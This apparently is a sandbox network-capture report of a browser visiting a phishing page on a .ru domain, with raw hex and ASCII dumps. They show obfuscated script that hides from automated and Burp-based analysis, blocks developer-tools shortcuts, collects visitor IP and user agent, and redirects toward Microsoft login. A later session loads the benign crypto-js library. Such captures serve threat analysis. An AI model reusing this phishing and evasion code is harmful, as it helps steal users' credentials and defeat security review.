                                                                                      2025-01-09 04:10:57 UTC1369INData Raw: 31 63 35 34 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 75 73 75 61 6c 6c 79 20 63 6f 6d 65 73 20 74 6f 20 74 68 6f 73 65 20 77 68 6f 20 61 72 65 20 74 6f 6f 20 62 75 73 79 20 74 6f 20 62 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 74 2e 20 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 41 6c 6c 20 6f 75 72 20 64 72 65 61 6d 73 20 63 61 6e 20 63 6f 6d 65 20 74 72 75 65 20 69 66 20 77 65 20 68 61 76 65 20 74 68 65 20 63 6f 75 72 61 67 65 20 74 6f 20 70 75 72 73 75 65 20 74 68 65 6d 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 32 55 30 74 55 4c 6d 64 75 62 33 46 33 64 32 68 77 64 32 55 75 63 6e 55 76 4d 32 46 6c 53 79 38 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77
                                                                                      Data Ascii: 1c54... Success usually comes to those who are too busy to be looking for it. --><script>/* All our dreams can come true if we have the courage to pursue them. */if(atob("aHR0cHM6Ly82U0tULmdub3F3d2hwd2UucnUvM2FlSy8=") == "nomatch"){document.w
                                                                                      2025-01-09 04:10:57 UTC1369INData Raw: 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 31 5a 34 64 57 31 4a 53 30 46 75 57 6e 49 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 56 6e 68 31 62 55 6c 4c 51 57 35 61 63 69 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 31 5a 34 64 57 31 4a 53 30 46 75 57 6e 49 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 30 4e 43 69 4e 57
                                                                                      Data Ascii: m9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI1Z4dW1JS0FuWnIgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojVnh1bUlLQW5aciBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI1Z4dW1JS0FuWnIuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO30NCiNW
                                                                                      2025-01-09 04:10:57 UTC1369INData Raw: 70 4e 61 55 6c 6e 59 55 64 57 63 46 6f 79 61 44 42 51 55 30 6c 36 54 57 6c 4a 5a 31 70 74 62 48 4e 69 52 44 42 70 59 6d 30 35 64 56 70 54 53 57 64 6b 62 57 78 73 5a 44 42 4b 64 6d 56 45 4d 47 6c 4e 51 30 46 33 53 55 52 4a 4d 6b 6c 45 53 54 4a 4a 61 6a 51 34 59 30 64 47 4d 47 46 44 51 6d 31 68 56 33 68 7a 55 46 4e 4a 61 6c 70 45 62 47 74 50 56 31 45 31 53 57 6c 43 61 31 42 54 53 6b 35 4e 56 45 31 6e 54 55 64 46 65 45 31 35 51 58 68 4e 65 55 46 33 53 55 52 46 5a 30 31 44 51 58 64 4a 52 45 6b 79 53 55 52 46 65 6b 6c 45 52 58 70 4a 52 45 46 6e 54 55 4e 42 64 30 6c 45 51 58 52 4e 61 6c 70 30 54 55 4e 42 65 55 35 48 52 58 68 4e 55 30 46 34 54 56 4e 42 64 30 6c 45 52 57 64 4e 55 30 46 33 54 46 52 4a 65 55 6c 45 52 58 68 4a 52 45 56 34 53 55 52 42 5a 30 31 44 51
                                                                                      Data Ascii: pNaUlnYUdWcFoyaDBQU0l6TWlJZ1ptbHNiRDBpYm05dVpTSWdkbWxsZDBKdmVEMGlNQ0F3SURJMklESTJJajQ4Y0dGMGFDQm1hV3hzUFNJalpEbGtPV1E1SWlCa1BTSk5NVE1nTUdFeE15QXhNeUF3SURFZ01DQXdJREkySURFeklERXpJREFnTUNBd0lEQXRNalp0TUNBeU5HRXhNU0F4TVNBd0lERWdNU0F3TFRJeUlERXhJREV4SURBZ01DQ
                                                                                      2025-01-09 04:10:57 UTC1369INData Raw: 7a 4c 58 52 6c 65 48 52 37 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 79 5a 58 42 6c 59 58 51 36 62 6d 38 74 63 6d 56 77 5a 57 46 30 4f 32 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 63 32 6c 36 5a 54 70 6a 62 32 35 30 59 57 6c 75 4f 33 30 4e 43 69 4e 6a 61 47 46 73 62 47 56 75 5a 32 55 74 63 33 56 6a 59 32 56 7a 63 79 31 30 5a 58 68 30 65 32 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 61 57 31 68 5a 32 55 36 64 58 4a 73 4b 47 52 68 64 47 45 36 61 57 31 68 5a 32 55 76 63 33 5a 6e 4b 33 68 74 62 44 74 69 59 58 4e 6c 4e 6a 51 73 55 45 68 4f 4d 6c 70 35 51 6a 52 69 56 33 68 31 59 33 6f 77 61 57 46 49 55 6a 42 6a 52 47 39 32 54 44 4e 6b 4d 32 52 35 4e 54 4e 4e 65 54 56 32 59 32 31 6a 64 6b 31 71 51 58 64 4e 51 7a 6c 36 5a 47 31 6a 61 55 6c 49 5a 48 42 61 53 46
                                                                                      Data Ascii: zLXRleHR7YmFja2dyb3VuZC1yZXBlYXQ6bm8tcmVwZWF0O2JhY2tncm91bmQtc2l6ZTpjb250YWluO30NCiNjaGFsbGVuZ2Utc3VjY2Vzcy10ZXh0e2JhY2tncm91bmQtaW1hZ2U6dXJsKGRhdGE6aW1hZ2Uvc3ZnK3htbDtiYXNlNjQsUEhOMlp5QjRiV3h1Y3owaWFIUjBjRG92TDNkM2R5NTNNeTV2Y21jdk1qQXdNQzl6ZG1jaUlIZHBaSF
                                                                                      2025-01-09 04:10:57 UTC1369INData Raw: 4f 33 30 4e 43 69 35 73 5a 48 4d 74 63 6d 6c 75 5a 79 42 6b 61 58 59 36 5a 6d 6c 79 63 33 51 74 59 32 68 70 62 47 52 37 59 57 35 70 62 57 46 30 61 57 39 75 4c 57 52 6c 62 47 46 35 4f 69 30 75 4e 44 56 7a 4f 33 30 4e 43 69 35 73 5a 48 4d 74 63 6d 6c 75 5a 79 42 6b 61 58 59 36 62 6e 52 6f 4c 57 4e 6f 61 57 78 6b 4b 44 49 70 65 32 46 75 61 57 31 68 64 47 6c 76 62 69 31 6b 5a 57 78 68 65 54 6f 74 4c 6a 4e 7a 4f 33 30 4e 43 69 35 73 5a 48 4d 74 63 6d 6c 75 5a 79 42 6b 61 58 59 36 62 6e 52 6f 4c 57 4e 6f 61 57 78 6b 4b 44 4d 70 65 32 46 75 61 57 31 68 64 47 6c 76 62 69 31 6b 5a 57 78 68 65 54 6f 74 4c 6a 45 31 63 7a 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 63 32 4e 79 5a 57 56 75 49 47 46 75 5a 43 41 6f 4c 57 31 7a 4c 57 68 70 5a 32 67 74 59 32 39 75 64 48 4a
                                                                                      Data Ascii: O30NCi5sZHMtcmluZyBkaXY6Zmlyc3QtY2hpbGR7YW5pbWF0aW9uLWRlbGF5Oi0uNDVzO30NCi5sZHMtcmluZyBkaXY6bnRoLWNoaWxkKDIpe2FuaW1hdGlvbi1kZWxheTotLjNzO30NCi5sZHMtcmluZyBkaXY6bnRoLWNoaWxkKDMpe2FuaW1hdGlvbi1kZWxheTotLjE1czt9DQpAbWVkaWEgc2NyZWVuIGFuZCAoLW1zLWhpZ2gtY29udHJ
                                                                                      2025-01-09 04:10:57 UTC415INData Raw: 57 64 68 64 47 39 79 4c 6e 64 6c 59 6d 52 79 61 58 5a 6c 63 69 42 38 66 43 42 33 61 57 35 6b 62 33 63 75 59 32 46 73 62 46 42 6f 59 57 35 30 62 32 30 67 66 48 77 67 64 32 6c 75 5a 47 39 33 4c 6c 39 77 61 47 46 75 64 47 39 74 49 48 78 38 49 47 35 68 64 6d 6c 6e 59 58 52 76 63 69 35 31 63 32 56 79 51 57 64 6c 62 6e 51 75 61 57 35 6a 62 48 56 6b 5a 58 4d 6f 49 6b 4a 31 63 6e 41 69 4b 53 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 67 50 53 41 69 59 57 4a 76 64 58 51 36 59 6d 78 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75
                                                                                      Data Ascii: WdhdG9yLndlYmRyaXZlciB8fCB3aW5kb3cuY2FsbFBoYW50b20gfHwgd2luZG93Ll9waGFudG9tIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5jbHVkZXMoIkJ1cnAiKSkgew0KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9u
                                                                                      2025-01-09 04:10:57 UTC1369INData Raw: 64 33 33 0d 0a 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 7a 4d 70 49 48 78 38 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6e 4e 6f 61 57 5a 30 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 59 33
                                                                                      Data Ascii: d330KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDY3
                                                                                      2025-01-09 04:10:57 UTC1369INData Raw: 68 46 53 6e 6c 71 62 58 52 6d 49 43 30 67 52 57 35 4b 65 6b 74 76 53 55 6c 4e 52 79 41 2b 49 48 68 36 61 32 31 59 56 30 78 74 63 31 6f 67 4a 69 59 67 49 57 4a 47 65 56 6c 6e 56 46 70 43 53 30 30 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 78 73 53 58 68 42 51 6b 64 5a 57 46 51 67 50 53 42 30 63 6e 56 6c 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 59 6b 5a 35 57 57 64 55 57 6b 4a 4c 54 53 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 75 63 6d 56 77 62 47 46 6a 5a 53 67 6e 61 48 52 30 63 48 4d 36 4c 79 39 73 62 32 64 70 62 69 35 74 61 57 4e 79 62 33 4e 76 5a 6e 52 76 62 6d 78 70 62 6d 55 75 59 32 39 74 4a 79 6b 37 44
                                                                                      Data Ascii: hFSnlqbXRmIC0gRW5KektvSUlNRyA+IHh6a21YV0xtc1ogJiYgIWJGeVlnVFpCS00pIHsNCiAgICAgICAgICAgIGxsSXhBQkdZWFQgPSB0cnVlOw0KICAgICAgICAgICAgYkZ5WWdUWkJLTSA9IHRydWU7DQogICAgICAgICAgICB3aW5kb3cubG9jYXRpb24ucmVwbGFjZSgnaHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tJyk7D
                                                                                      2025-01-09 04:10:57 UTC648INData Raw: 39 49 69 49 2b 44 51 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 47 6c 77 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 61 58 41 69 49 48 5a 68 62 48 56 6c 50 53 4a 56 62 6d 74 75 62 33 64 75 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 32 59 57 78 31 5a 54 30 69 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 64 57 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 31 59 53 49 67 64 6d 46 73 64 57 55 39 49 6c 56 75 61 32 35 76 64 32
                                                                                      Data Ascii: 9IiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZGlwIiBuYW1lPSJibHRkaXAiIHZhbHVlPSJVbmtub3duIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkcmVmIiBuYW1lPSJibHRkcmVmIiB2YWx1ZT0iIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkdWEiIG5hbWU9ImJsdGR1YSIgdmFsdWU9IlVua25vd2


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.1649712104.17.24.144437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:10:57 UTC651OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                      Host: cdnjs.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://lap.gnoqwwhpwe.ru/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:10:58 UTC957INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:10:57 GMT
                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: public, max-age=30672000
                                                                                      ETag: W/"61182885-40eb"
                                                                                      Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                      cf-cdnjs-via: cfworker/kv
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Timing-Allow-Origin: *
                                                                                      X-Content-Type-Options: nosniff
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 53668
                                                                                      Expires: Tue, 30 Dec 2025 04:10:57 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oXvW7FqypqW0bFEL6gNCyzKeGoU69MT98YjEnNOpRbffg%2BO8hUXBVsLFZckH1NzvGp8OQMzIndB68kiS9X7NkzRoorVd4RXEQWWeaz%2B9it2701TQCdp3i3dc%2FUgBWFUw6v5mYsFT"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                      Strict-Transport-Security: max-age=15780000
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff194a0592bde93-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2025-01-09 04:10:58 UTC412INData Raw: 37 62 66 34 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                      Data Ascii: 7bf4!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                      2025-01-09 04:10:58 UTC1369INData Raw: 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74
                                                                                      Data Ascii: globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.creat
                                                                                      2025-01-09 04:10:58 UTC1369INData Raw: 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74
                                                                                      Data Ascii: ll(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)t
                                                                                      2025-01-09 04:10:58 UTC1369INData Raw: 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61
                                                                                      Data Ascii: of t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a
                                                                                      2025-01-09 04:10:58 UTC1369INData Raw: 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f
                                                                                      Data Ascii: r t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?
                                                                                      2025-01-09 04:10:58 UTC1369INData Raw: 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e
                                                                                      Data Ascii: r(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>
                                                                                      2025-01-09 04:10:58 UTC1369INData Raw: 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e
                                                                                      Data Ascii: t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:fun
